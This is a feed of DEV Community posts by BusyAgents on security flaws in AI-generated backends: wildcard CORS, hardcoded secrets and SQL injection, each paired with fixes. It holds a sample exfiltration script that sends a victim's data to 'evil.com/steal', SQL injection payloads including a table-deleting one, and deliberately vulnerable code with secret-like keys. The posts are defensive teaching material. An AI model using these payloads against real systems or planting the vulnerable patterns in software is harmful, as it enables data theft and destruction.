DEV Community: BusyAgents The latest articles on DEV Community by BusyAgents (@busyagents). https://dev.to/busyagents https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F3825295%2F58ab0a53-8e9f-4a04-8f81-0f612298357a.png DEV Community: BusyAgents https://dev.to/busyagents en AI-Generated Backends Almost Always Get CORS Wrong BusyAgents Tue, 24 Mar 2026 10:09:17 +0000 https://dev.to/busyagents/ai-generated-backends-almost-always-get-cors-wrong-2ic6 https://dev.to/busyagents/ai-generated-backends-almost-always-get-cors-wrong-2ic6 <h2> TL;DR </h2> <ul> <li>AI editors output <code>app.use(cors())</code> with zero config by default - that's a wildcard CORS policy</li> <li>On unauthenticated public APIs this is fine. On anything with sessions or JWT auth, it's a credential theft vector</li> <li>Three lines fix it, but you have to know to look</li> </ul> <p>I was reviewing a Node.js API a friend built last month. Express backend, JWT auth, clean structure. The AI had written basically everything from scratch in a weekend. It worked perfectly. And buried in the middleware setup, six lines from the top:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="nf">cors</span><span class="p">());</span> <span class="c1">// CWE-942</span> </code></pre> </div> <p>No config. No options. Full wildcard. Any origin, including <code>evil.com</code>, could make credentialed cross-origin requests to that API.</p> <p>I've seen this pattern dozens of times. Not from developers who don't know better. From fast-moving teams using AI editors to ship quickly. The AI writes code that passes every test and ships perfectly - but the security assumptions baked into that code are frequently from a different era.</p> <h2> The Vulnerable Pattern </h2> <p>Here's what AI editors produce when you ask for a basic Express API with CORS support:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">express</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">cors</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">cors</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nf">express</span><span class="p">();</span> <span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="nf">cors</span><span class="p">());</span> <span class="c1">// CWE-942: Wildcard CORS - accepts requests from ANY origin</span> <span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/user/profile</span><span class="dl">'</span><span class="p">,</span> <span class="nx">authenticate</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">user</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">User</span><span class="p">.</span><span class="nf">findById</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">userId</span><span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">user</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>The <code>cors()</code> call with no arguments maps to <code>Access-Control-Allow-Origin: *</code>. When combined with cookies or Authorization headers, this becomes a direct attack vector.</p> <p>An attacker hosting <code>evil.com</code> can write:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nf">fetch</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://yourapi.com/api/user/profile</span><span class="dl">'</span><span class="p">,</span> <span class="p">{</span> <span class="na">credentials</span><span class="p">:</span> <span class="dl">'</span><span class="s1">include</span><span class="dl">'</span> <span class="p">}).</span><span class="nf">then</span><span class="p">(</span><span class="nx">r</span> <span class="o">=&gt;</span> <span class="nx">r</span><span class="p">.</span><span class="nf">json</span><span class="p">()).</span><span class="nf">then</span><span class="p">(</span><span class="nx">data</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="nb">navigator</span><span class="p">.</span><span class="nf">sendBeacon</span><span class="p">(</span><span class="dl">'</span><span class="s1">https://evil.com/steal</span><span class="dl">'</span><span class="p">,</span> <span class="nx">JSON</span><span class="p">.</span><span class="nf">stringify</span><span class="p">(</span><span class="nx">data</span><span class="p">));</span> <span class="p">});</span> </code></pre> </div> <p>If the user has an active session cookie, that request goes through. The response comes back. The data leaks.</p> <h2> Why AI Keeps Generating This </h2> <p>The training data for AI models is saturated with tutorial code and Stack Overflow answers written before the security implications of wildcard CORS were well understood. When you search "express cors setup", the top answers almost universally show <code>app.use(cors())</code> with no configuration. Simple, clean, works immediately.</p> <p>AI optimises for code that works and matches the style of what was most upvoted. Security edge cases don't show up in unit tests. They show up in incident reports.</p> <p>There's also a subtlety: <code>Access-Control-Allow-Origin: *</code> is fine for public, read-only APIs. The problem surfaces when you add authentication. AI doesn't know whether your API will eventually be authenticated - it writes the simplest thing that satisfies the immediate request.</p> <h2> The Fix </h2> <p>Three lines:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="nf">cors</span><span class="p">({</span> <span class="na">origin</span><span class="p">:</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">ALLOWED_ORIGIN</span> <span class="o">||</span> <span class="dl">'</span><span class="s1">https://yourfrontend.com</span><span class="dl">'</span><span class="p">,</span> <span class="na">credentials</span><span class="p">:</span> <span class="kc">true</span> <span class="p">}));</span> </code></pre> </div> <p>For multiple origins, use a whitelist function:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">allowedOrigins</span> <span class="o">=</span> <span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">ALLOWED_ORIGINS</span> <span class="o">||</span> <span class="dl">''</span><span class="p">).</span><span class="nf">split</span><span class="p">(</span><span class="dl">'</span><span class="s1">,</span><span class="dl">'</span><span class="p">);</span> <span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="nf">cors</span><span class="p">({</span> <span class="na">origin</span><span class="p">:</span> <span class="p">(</span><span class="nx">origin</span><span class="p">,</span> <span class="nx">callback</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">origin</span> <span class="o">||</span> <span class="nx">allowedOrigins</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="nx">origin</span><span class="p">))</span> <span class="p">{</span> <span class="nf">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nf">callback</span><span class="p">(</span><span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="dl">'</span><span class="s1">Not allowed by CORS</span><span class="dl">'</span><span class="p">));</span> <span class="p">}</span> <span class="p">},</span> <span class="na">credentials</span><span class="p">:</span> <span class="kc">true</span> <span class="p">}));</span> </code></pre> </div> <p>Put <code>ALLOWED_ORIGINS=https://yourfrontend.com</code> in your <code>.env</code> and update it per environment. That's the full fix.</p> <p>If you're building a truly public API with no auth, keep the wildcard. But the moment you add sessions, cookies, or Authorization headers, lock it down.</p> <p>I've been running <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> for this. It hooks into Cursor and Claude Code as an MCP server and flags these patterns before I move on. That said, even a basic pre-commit hook with semgrep and gitleaks will catch most of what's in this post. The important thing is catching it early, whatever tool you use.</p> security webdev ai devsecops Your AI Wrote a CORS Config That Lets Any Website Read Your API BusyAgents Mon, 23 Mar 2026 13:40:23 +0000 https://dev.to/busyagents/your-ai-wrote-a-cors-config-that-lets-any-website-read-your-api-1h79 https://dev.to/busyagents/your-ai-wrote-a-cors-config-that-lets-any-website-read-your-api-1h79 <h2> TL;DR </h2> <ul> <li>AI assistants default to <code>Access-Control-Allow-Origin: *</code> — a wildcard that opens your API to every domain on the internet</li> <li>When combined with a naive credentials check, this escalates from sloppy to exploitable</li> <li>Audit every CORS config your AI generated and replace wildcards with explicit origin lists</li> </ul> <p>I was reviewing a side project a friend built with Cursor last month. Node/Express backend, straightforward REST API, nothing fancy. The app worked fine. The CORS setup was a different story.</p> <p>Every route was wide open. One line at the top of the file: <code>app.use(cors())</code>. No origin list, no credentials check, no thought. Just a call to the cors package with zero config. I've seen this pattern in probably a third of AI-generated Express apps I've touched this year.</p> <p>The default behavior of <code>cors()</code> in Express sets <code>Access-Control-Allow-Origin: *</code>. That means any website on the internet can make cross-origin requests to the API from a visitor's browser. For a read-only public API, that's maybe acceptable. For an API that handles user data or authentication, it's a real problem.</p> <h2> The Vulnerable Code (CWE-942) </h2> <p>Here's the pattern that appears constantly in AI-generated backends:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// server.js — AI-generated Express setup</span> <span class="kd">const</span> <span class="nx">express</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">express</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">cors</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">cors</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">app</span> <span class="o">=</span> <span class="nf">express</span><span class="p">();</span> <span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="nf">cors</span><span class="p">());</span> <span class="c1">// wildcard — Access-Control-Allow-Origin: *</span> <span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/user/profile</span><span class="dl">'</span><span class="p">,</span> <span class="nx">requireAuth</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">user</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">User</span><span class="p">.</span><span class="nf">findById</span><span class="p">(</span><span class="nx">req</span><span class="p">.</span><span class="nx">user</span><span class="p">.</span><span class="nx">id</span><span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">user</span><span class="p">);</span> <span class="p">});</span> <span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/admin/users</span><span class="dl">'</span><span class="p">,</span> <span class="nx">requireAdmin</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="nx">users</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">User</span><span class="p">.</span><span class="nf">findAll</span><span class="p">();</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">users</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>The damage compounds when you see this paired with a naive origin callback:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Even worse pattern — accepts every origin including null</span> <span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="nf">cors</span><span class="p">({</span> <span class="na">origin</span><span class="p">:</span> <span class="p">(</span><span class="nx">origin</span><span class="p">,</span> <span class="nx">callback</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="nf">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="kc">true</span><span class="p">),</span> <span class="na">credentials</span><span class="p">:</span> <span class="kc">true</span> <span class="p">}));</span> </code></pre> </div> <p>Now you have a path for cross-site request attacks. Any malicious page a logged-in user visits can pull their profile data, drain their session, or hit admin routes — because the server told the browser it trusts everyone.</p> <h2> Why AI Generates This </h2> <p>CORS errors are loud. <code>No 'Access-Control-Allow-Origin' header is present</code> is one of the most Googled browser errors. Every tutorial that fixes it reaches for <code>cors()</code> with no arguments or <code>origin: '*'</code>. The AI learned from those tutorials and treats "make the error go away" as a solved problem.</p> <p>There's also a context issue. When AI generates a backend scaffold, it defaults to "it should work" over "it should be locked down." Wide CORS gets the app running immediately. A restricted config requires knowing the production domain up front, which the AI doesn't have at generation time.</p> <h2> The Fix </h2> <p>Replace the default <code>cors()</code> call with an explicit origin allowlist:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">allowedOrigins</span> <span class="o">=</span> <span class="p">[</span> <span class="dl">'</span><span class="s1">https://yourapp.com</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">https://www.yourapp.com</span><span class="dl">'</span><span class="p">,</span> <span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">NODE_ENV</span> <span class="o">===</span> <span class="dl">'</span><span class="s1">development</span><span class="dl">'</span> <span class="p">?</span> <span class="dl">'</span><span class="s1">http://localhost:3000</span><span class="dl">'</span> <span class="p">:</span> <span class="kc">null</span> <span class="p">].</span><span class="nf">filter</span><span class="p">(</span><span class="nb">Boolean</span><span class="p">);</span> <span class="nx">app</span><span class="p">.</span><span class="nf">use</span><span class="p">(</span><span class="nf">cors</span><span class="p">({</span> <span class="na">origin</span><span class="p">:</span> <span class="p">(</span><span class="nx">origin</span><span class="p">,</span> <span class="nx">callback</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="c1">// Allow server-to-server requests (no origin header) or allowlisted origins</span> <span class="k">if </span><span class="p">(</span><span class="o">!</span><span class="nx">origin</span> <span class="o">||</span> <span class="nx">allowedOrigins</span><span class="p">.</span><span class="nf">includes</span><span class="p">(</span><span class="nx">origin</span><span class="p">))</span> <span class="p">{</span> <span class="nf">callback</span><span class="p">(</span><span class="kc">null</span><span class="p">,</span> <span class="kc">true</span><span class="p">);</span> <span class="p">}</span> <span class="k">else</span> <span class="p">{</span> <span class="nf">callback</span><span class="p">(</span><span class="k">new</span> <span class="nc">Error</span><span class="p">(</span><span class="s2">`CORS blocked: </span><span class="p">${</span><span class="nx">origin</span><span class="p">}</span><span class="s2">`</span><span class="p">));</span> <span class="p">}</span> <span class="p">},</span> <span class="na">credentials</span><span class="p">:</span> <span class="kc">true</span><span class="p">,</span> <span class="na">methods</span><span class="p">:</span> <span class="p">[</span><span class="dl">'</span><span class="s1">GET</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">POST</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">PUT</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">DELETE</span><span class="dl">'</span><span class="p">],</span> <span class="na">allowedHeaders</span><span class="p">:</span> <span class="p">[</span><span class="dl">'</span><span class="s1">Content-Type</span><span class="dl">'</span><span class="p">,</span> <span class="dl">'</span><span class="s1">Authorization</span><span class="dl">'</span><span class="p">]</span> <span class="p">}));</span> </code></pre> </div> <p>Audit your existing projects with two quick greps:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"cors()"</span> ./src <span class="nt">--include</span><span class="o">=</span><span class="s2">"*.js"</span> | <span class="nb">grep</span> <span class="nt">-v</span> allowedOrigins <span class="nb">grep</span> <span class="nt">-r</span> <span class="s2">"origin: '*'"</span> ./src <span class="nt">--include</span><span class="o">=</span><span class="s2">"*.js"</span> </code></pre> </div> <p>Any match is worth reviewing manually before shipping.</p> <p>I've been running <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> for this. It hooks into Cursor and Claude Code as an MCP server and flags these patterns before I move on. That said, even a basic pre-commit hook with semgrep and gitleaks will catch most of what's in this post. The important thing is catching it early, whatever tool you use.</p> security javascript webdev ai Your AI Just Hardcoded Your Stripe Key. Here's Why It Keeps Happening. BusyAgents Sun, 22 Mar 2026 12:53:14 +0000 https://dev.to/busyagents/your-ai-just-hardcoded-your-stripe-key-heres-why-it-keeps-happening-2mp3 https://dev.to/busyagents/your-ai-just-hardcoded-your-stripe-key-heres-why-it-keeps-happening-2mp3 <h2> TL;DR </h2> <ul> <li>AI code generators embed live secrets directly in source files more often than you'd expect</li> <li>The pattern comes from training data full of tutorials where authors hardcoded values for simplicity</li> <li>The fix is a single env var lookup, but you need a scanner to catch it before it reaches git history</li> </ul> <p>I was doing a code review last week when I spotted it. Buried three files deep in a side project: a real Stripe live key, hardcoded directly into the payment service. The AI had generated it that way, the developer hadn't noticed, and it had already been committed twice.</p> <p>Not a test key. Not a placeholder. An actual live key that could drain an account.</p> <p>This isn't rare. I've started checking for hardcoded secrets as a reflex whenever I see AI-generated backend code. It shows up in roughly a third of the projects I look at - Stripe keys, OpenAI API tokens, database passwords, JWT signing secrets. The AI fills in the slot where it thinks a value goes, and the training data is full of tutorials where the author hardcoded their own key for "simplicity."</p> <h2> The Pattern (CWE-798) </h2> <p>The vulnerable version typically looks like this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// ai-generated payment service</span> <span class="kd">const</span> <span class="nx">stripe</span> <span class="o">=</span> <span class="nf">require</span><span class="p">(</span><span class="dl">'</span><span class="s1">stripe</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">client</span> <span class="o">=</span> <span class="nf">stripe</span><span class="p">(</span><span class="dl">'</span><span class="s1">sk_live_4xKp9mZqR3vNhJ8wXcTbL7eY</span><span class="dl">'</span><span class="p">);</span> <span class="kd">const</span> <span class="nx">createCharge</span> <span class="o">=</span> <span class="k">async </span><span class="p">(</span><span class="nx">amount</span><span class="p">,</span> <span class="nx">token</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="k">return</span> <span class="nx">client</span><span class="p">.</span><span class="nx">charges</span><span class="p">.</span><span class="nf">create</span><span class="p">({</span> <span class="nx">amount</span><span class="p">,</span> <span class="na">currency</span><span class="p">:</span> <span class="dl">'</span><span class="s1">usd</span><span class="dl">'</span><span class="p">,</span> <span class="na">source</span><span class="p">:</span> <span class="nx">token</span><span class="p">,</span> <span class="p">});</span> <span class="p">};</span> </code></pre> </div> <p>The AI grabbed a plausible-looking key format and stuck it inline. Sometimes it's a clearly fake placeholder, but sometimes it looks suspiciously real - or it's an actual key if the developer had pasted it anywhere in the conversation context.</p> <p>Same pattern shows up with database connection strings:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">pool</span> <span class="o">=</span> <span class="k">new</span> <span class="nc">Pool</span><span class="p">({</span> <span class="na">connectionString</span><span class="p">:</span> <span class="dl">'</span><span class="s1">postgresql://admin:hunter2@db.myapp.io:5432/production</span><span class="dl">'</span> <span class="p">});</span> </code></pre> </div> <p>And with JWT signing:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">token</span> <span class="o">=</span> <span class="nx">jwt</span><span class="p">.</span><span class="nf">sign</span><span class="p">(</span><span class="nx">payload</span><span class="p">,</span> <span class="dl">'</span><span class="s1">my-super-secret-jwt-key-12345</span><span class="dl">'</span><span class="p">);</span> </code></pre> </div> <h2> Why AI Does This </h2> <p>The model has seen thousands of tutorials, README files, and Stack Overflow answers where the author hardcoded a value. Stack Overflow in particular is full of examples from 2015 where someone wrote <code>const apiKey = 'sk_test_...'</code> because they were demonstrating a concept, not shipping production code.</p> <p>The AI learned to fill the slot. It doesn't know the difference between a tutorial showing how an API works and production code that should read from environment variables. It predicts the most statistically likely token for that position, and the most likely token is a hardcoded value because that's what it saw most often.</p> <p>The 2023 GitGuardian State of Secrets Sprawl report found over 10 million secrets committed to public GitHub repos that year. A meaningful chunk of those are almost certainly from developers shipping AI-generated code without reviewing it.</p> <h2> The Fix </h2> <p>It's one line. Replace:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">client</span> <span class="o">=</span> <span class="nf">stripe</span><span class="p">(</span><span class="dl">'</span><span class="s1">sk_live_4xKp9mZqR3vNhJ8wXcTbL7eY</span><span class="dl">'</span><span class="p">);</span> </code></pre> </div> <p>With:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="kd">const</span> <span class="nx">client</span> <span class="o">=</span> <span class="nf">stripe</span><span class="p">(</span><span class="nx">process</span><span class="p">.</span><span class="nx">env</span><span class="p">.</span><span class="nx">STRIPE_SECRET_KEY</span><span class="p">);</span> </code></pre> </div> <p>Full setup takes five minutes:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># 1. Install dotenv if you're not already using it</span> npm <span class="nb">install </span>dotenv <span class="c"># 2. Create a .env file and add it to .gitignore immediately</span> <span class="nb">echo</span> <span class="s2">"STRIPE_SECRET_KEY=sk_live_..."</span> <span class="o">&gt;&gt;</span> .env <span class="nb">echo</span> <span class="s2">".env"</span> <span class="o">&gt;&gt;</span> .gitignore <span class="c"># 3. Load it in your entry point</span> require<span class="o">(</span><span class="s1">'dotenv'</span><span class="o">)</span>.config<span class="o">()</span><span class="p">;</span> </code></pre> </div> <p>For production, use your platform's secrets manager: AWS Secrets Manager, GCP Secret Manager, Doppler, or environment variables set directly in your hosting dashboard.</p> <p>Adding a pre-commit hook that runs gitleaks before anything goes out is worth doing:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight yaml"><code><span class="c1"># .pre-commit-config.yaml</span> <span class="na">repos</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">repo</span><span class="pi">:</span> <span class="s">https://github.com/gitleaks/gitleaks</span> <span class="na">rev</span><span class="pi">:</span> <span class="s">v8.18.4</span> <span class="na">hooks</span><span class="pi">:</span> <span class="pi">-</span> <span class="na">id</span><span class="pi">:</span> <span class="s">gitleaks</span> </code></pre> </div> <p>That catches most secrets before they ever touch git history.</p> <h2> If a Secret Already Got Committed </h2> <p>Rotate it immediately. Don't just delete the file and commit again - the key is still in git history. You need to:</p> <ol> <li>Invalidate the key in the provider's dashboard right now</li> <li>Generate a new one</li> <li>Use BFG Repo Cleaner or <code>git filter-branch</code> to scrub the history if the repo is public or shared</li> </ol> <p>Removing the value in the latest commit doesn't make it safe. History is permanent unless you actively rewrite it.</p> <h2> Catching It Before It Ships </h2> <p>I've been running <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> on my projects for this. Its Gitleaks-based secrets scanner hooks into Cursor and Claude Code as an MCP server and flags hardcoded secrets before I finish the session. That said, even a basic pre-commit hook with gitleaks will catch most of what's in this post. The important thing is catching it before it reaches git history, whatever tool you use.</p> security webdev ai devsecops The SQL Injection That Lives in Every AI-Generated Search Endpoint BusyAgents Sat, 21 Mar 2026 15:29:49 +0000 https://dev.to/busyagents/the-sql-injection-that-lives-in-every-ai-generated-search-endpoint-39kk https://dev.to/busyagents/the-sql-injection-that-lives-in-every-ai-generated-search-endpoint-39kk <h2> TL;DR </h2> <ul> <li><p>AI copilots generate SQL queries using template literals - that is CWE-89 SQL injection</p></li> <li><p>Your database cannot tell the difference between a legit request and an attack</p></li> <li><p>Fix is one line: parameterized queries. Your driver handles the rest.</p></li> </ul> <p>A client sent me their Node.js API to review three weeks ago. Express, PostgreSQL, Prisma for most of the data layer. They had built the whole thing in Cursor over about two weeks. Code quality was genuinely good - TypeScript throughout, consistent patterns, proper error handling. The AI had done a solid job structuring it.</p> <p>Then I hit the order search endpoint.</p> <h2> The Vulnerable Code (CWE-89) </h2> <p>The developer needed a flexible search with multiple optional filters. The AI generated this:<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="nx">app</span><span class="p">.</span><span class="nf">get</span><span class="p">(</span><span class="dl">'</span><span class="s1">/api/orders/search</span><span class="dl">'</span><span class="p">,</span> <span class="k">async </span><span class="p">(</span><span class="nx">req</span><span class="p">,</span> <span class="nx">res</span><span class="p">)</span> <span class="o">=&gt;</span> <span class="p">{</span> <span class="kd">const</span> <span class="p">{</span> <span class="nx">customer</span><span class="p">,</span> <span class="nx">status</span><span class="p">,</span> <span class="nx">dateFrom</span> <span class="p">}</span> <span class="o">=</span> <span class="nx">req</span><span class="p">.</span><span class="nx">query</span><span class="p">;</span> <span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span> <span class="s2">`SELECT * FROM orders WHERE customer_name = '</span><span class="p">${</span><span class="nx">customer</span><span class="p">}</span><span class="s2">' AND status = '</span><span class="p">${</span><span class="nx">status</span><span class="p">}</span><span class="s2">' AND created_at &gt;= '</span><span class="p">${</span><span class="nx">dateFrom</span><span class="p">}</span><span class="s2">'`</span> <span class="p">);</span> <span class="nx">res</span><span class="p">.</span><span class="nf">json</span><span class="p">(</span><span class="nx">results</span><span class="p">.</span><span class="nx">rows</span><span class="p">);</span> <span class="p">});</span> </code></pre> </div> <p>Send <code>' OR '1'='1' --</code> as the customer parameter and you get every order in the database. No authentication required. Send <code>'; DELETE FROM orders WHERE '1'='1</code> and the table is gone.</p> <p>I showed the developer. They were surprised. They had asked the AI to "simplify the query" mid-session and it swapped out the parameterized version it had written first. One refactoring prompt, protection gone.</p> <h2> Why AI Keeps Writing This </h2> <p>This is not a knowledge gap. Ask the same LLM "is this query vulnerable to SQL injection?" and it will explain the problem accurately, cite CWE-89, and suggest the fix.</p> <p>The issue is generation context. When a model completes a "search with filters" function, it pattern-matches from training data. And training data has an enormous amount of quick-start tutorials, Stack Overflow answers, and legacy documentation showing string interpolation in database queries. The "gets it working" pattern outnumbers the production-safe version by a lot.</p> <p>Models do not ship software. They have no stake in what happens to your database six months from now.</p> <p>This pattern shows up in every language. JavaScript with template literals. Python with f-strings. Go with fmt.Sprintf in query strings. PHP with string concatenation. Same root cause, same fix.</p> <h2> The Fix </h2> <p>Parameterized queries. The query string is static. User input goes in a separate array. Your database driver handles escaping at the driver level - the database never sees user input as SQL syntax.</p> <p><strong>Node.js with node-postgres:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight javascript"><code><span class="c1">// Vulnerable - do not ship this</span> <span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span> <span class="s2">`SELECT * FROM orders WHERE customer_name = '</span><span class="p">${</span><span class="nx">customer</span><span class="p">}</span><span class="s2">' AND status = '</span><span class="p">${</span><span class="nx">status</span><span class="p">}</span><span class="s2">'`</span> <span class="p">);</span> <span class="c1">// Safe - parameterized</span> <span class="kd">const</span> <span class="nx">results</span> <span class="o">=</span> <span class="k">await</span> <span class="nx">db</span><span class="p">.</span><span class="nf">query</span><span class="p">(</span> <span class="dl">'</span><span class="s1">SELECT * FROM orders WHERE customer_name = $1 AND status = $2</span><span class="dl">'</span><span class="p">,</span> <span class="p">[</span><span class="nx">customer</span><span class="p">,</span> <span class="nx">status</span><span class="p">]</span> <span class="p">);</span> </code></pre> </div> <p><strong>Python with psycopg2:</strong><br> </p> <div class="highlight js-code-highlight"> <pre class="highlight python"><code><span class="c1"># Vulnerable </span><span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span><span class="sa">f</span><span class="sh">"</span><span class="s">SELECT * FROM users WHERE email = </span><span class="sh">'</span><span class="si">{</span><span class="n">email</span><span class="si">}</span><span class="sh">'</span><span class="s"> AND role = </span><span class="sh">'</span><span class="si">{</span><span class="n">role</span><span class="si">}</span><span class="sh">'"</span><span class="p">)</span> <span class="c1"># Safe </span><span class="n">cursor</span><span class="p">.</span><span class="nf">execute</span><span class="p">(</span> <span class="sh">"</span><span class="s">SELECT * FROM users WHERE email = %s AND role = %s</span><span class="sh">"</span><span class="p">,</span> <span class="p">(</span><span class="n">email</span><span class="p">,</span> <span class="n">role</span><span class="p">)</span> <span class="p">)</span> </code></pre> </div> <p>The rule: if the string that gets passed to <code>db.query()</code> ever changes based on user input, something is wrong.</p> <p>Most modern ORMs are safe by default - Prisma, SQLAlchemy, ActiveRecord. So developers assume the whole data layer is fine. But almost every project has raw queries somewhere. Complex reporting. Performance-critical joins. Database-specific features the ORM does not expose cleanly. Those are where this hides.<br> </p> <div class="highlight js-code-highlight"> <pre class="highlight shell"><code><span class="c"># Find raw template literal queries in Node.js</span> <span class="nb">grep</span> <span class="nt">-rn</span> <span class="s1">'db\.query(`\|pool\.query(`\|client\.query(`'</span> ./src <span class="c"># Find f-string queries in Python</span> <span class="nb">grep</span> <span class="nt">-rn</span> <span class="s1">'cursor\.execute(f'</span> ./ <span class="nb">grep</span> <span class="nt">-rn</span> <span class="s1">'connection\.execute(f'</span> ./ </code></pre> </div> <p>Run that in any codebase larger than a few weeks old. You will find something.</p> <p>I've been running <a href="https://safeweave.dev" rel="noopener noreferrer">SafeWeave</a> for this. It hooks into Cursor and Claude Code as an MCP server and flags these patterns before I move on. That said, even a basic pre-commit hook with semgrep and gitleaks will catch most of what's in this post. The important thing is catching it early, whatever tool you use.</p> security webdev ai devsecops Your AI-Generated Backend Has Its CORS Wide Open BusyAgents Fri, 20 Mar 2026 12:30:18 +0000 https://dev.to/busyagents/your-ai-generated-backend-has-its-cors-wide-open-2jjp https://dev.to/busyagents/your-ai-generated-backend-has-its-cors-wide-open-2jjp <h2> TL;DR </h2> <ul> <li>AI scaffolding tools default to <code>cors({ origin: '*' })</code> - wildcard CORS that lets any website call your API</li> <li>Combined with cookies or auth headers, this lets malicious sites make authenticated requests on behalf of your users</li> <li>Two lines of config is the fix, but only if you know to look for it</li> 